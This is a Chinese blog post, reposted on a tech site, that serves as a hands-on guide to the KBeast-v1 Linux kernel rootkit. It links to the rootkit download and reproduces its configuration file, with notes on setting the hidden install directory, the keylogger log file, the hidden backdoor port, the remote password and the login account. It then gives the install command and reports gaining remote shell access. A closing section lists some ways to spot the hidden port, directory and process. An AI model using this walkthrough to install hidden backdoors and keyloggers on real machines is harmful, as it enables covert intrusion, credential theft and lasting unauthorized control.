经验首页 前端设计 程序设计 Java相关 移动开发 数据库/运维 软件/图像 大数据/云计算 其他经验
当前位置:技术经验 » 其他 » 网络安全 » 查看文章
rootkit(kbeast-v1)
来源:cnblogs  作者:白桦林_HK  时间:2019/2/13 9:17:59  对本文有异议

 

 

Rootkit有应用级、内核级和硬件级

用的比较多的是内核级别,比如基于linux LKM编写的rootkit

 

rootkit可以理解为一个超级管理员的工具箱,这个工具箱通过调用系统LKM接口可以动态实现对内核功能的修改,从而实现相比普通后门程序的变态级功能,比如:

1、替换    ====> 可以将系统命令替换成其他内容,比如将ls替换成rm,这样一来当你敲入ls时实际执行的是rm

2、隐藏     ====>可以隐藏自身文件(ls看不到)、隐藏进程(ps aux看不到)、连接隐藏(netstat看不到开放的端口)等

3、嗅探    ====>可以实现键盘记录、网络访问记录等

 

正因为rootkit如此变态,因此很多黑客会在拿到目标主机后通过安装rootkit这种超级后门来隐藏自己和持续的控制该主机

 

需要注意的是因为rootkit是内核级别的代码,故要求root权限才能运行,并且rootkit要适配对应的linux内核版本!(功能牛X,但使用条件也苛刻啊- -!)

 

此处拿kbeast-v1这款rootkit来举例,附上下载链接:

http://www.core.ipsecs.com/rootkit/kernel-rootkit/

 下载得到ipsecs-kbeast-v1.tar文件,tar -zvxf ipsecs-kbeast-v1.tar得到kbeast-v1文件夹,其中包含如下文件:

config.h 为配置文件,在安装之前需要先对该配置文件进行修改

config.h:

  1. /*
  2. Kernel Beast Ver #1.0 - Configuration File
  3. Copyright Ph03n1X of IPSECS (c) 2011
  4. Get more research of ours http://ipsecs.com
  5. */
  6. /*Don't change this line*/
  7. #define TRUE 1
  8. #define FALSE 0
  9. /*
  10. Enable keylog probably makes the system unstable
  11. But worth to be tried
  12. */
  13. #define _KEYLOG_ TRUE
  14. /*Define your module & network daemon name*/
  15. #define KBEAST "kbeast"
  16. /*
  17. All files, dirs, process will be hidden
  18. Protected from deletion & being killed
  19. */
  20. #define _H4X0R_ "_h4x_"
  21. /*
  22. Directory where your rootkit will be saved
  23. You have to use _H4X0R_ in your directory name
  24. No slash (/) at the end
  25. */
  26. #define _H4X_PATH_ "/usr/_h4x_" =====>此处为安装路径,可以视情况修改。安装完成后该文件夹ls时不显示,cd _h4x_ 可以进入。
  27. /*
  28. File to save key logged data
  29. */
  30. #define _LOGFILE_ "acctlog" =====>日志(键盘记录)存放文件
  31. /*
  32. This port will be hidded from netstat
  33. */
  34. #define _HIDE_PORT_ 13377 ======>监听端口(用作后门连接,远程telnet这台设备的13377端口即可获取shell)
  35. /*
  36. Password for remote access
  37. */
  38. #define _RPASSWORD_ "123456" ======>远程连接到这台设备时的密码
  39. #define _MAGIC_NAME_ "test01" ======>远程连接过来时给与什么账户(如果此处设为'root'telnet过来时就是root权限)
  40. /*
  41. Magic signal & pid for local escalation
  42. */
  43. #define _MAGIC_SIG_ 37 //kill signal
  44. #define _MAGIC_PID_ 31337 //kill this pid

接下来开始安装步骤:

执行 ./setup 时显示:

build参数:安装

clean参数:卸载

version:可以看见支持2.6.18和2.6.32版本的内核

 

 

执行 ./setup build 开始安装

结果如上,显示安装完成

 

此时远程连接此设备的13377端口,成功进入该设备,且得到的用户为指定用户

 

 

总结:

安装完成后netstat看不到对应的侦听端口,但是扫描可以发现(因为扫描相当于真实去连接这个端口)

在usr下ls看不到相应目录,但是cd /usr/_h4x_可以进入

键盘记录存储于/usr/_h4x_下的acctlog.0

ps aux时看不到进程,但是ps aux|grep h4x时可以看到

 

原文链接:http://www.cnblogs.com/baihualin/p/10366550.html

 友情链接:直通硅谷  点职佳  北美留学生论坛

本站QQ群:前端 618073944 | Java 606181507 | Python 626812652 | C/C++ 612253063 | 微信 634508462 | 苹果 692586424 | C#/.net 182808419 | PHP 305140648 | 运维 608723728

W3xue 的所有内容仅供测试,对任何法律问题及风险不承担任何责任。通过使用本站内容随之而来的风险与本站无关。
关于我们  |  意见建议  |  捐助我们  |  报错有奖  |  广告合作、友情链接(目前9元/月)请联系QQ:27243702 沸活量
皖ICP备17017327号-2 皖公网安备34020702000426号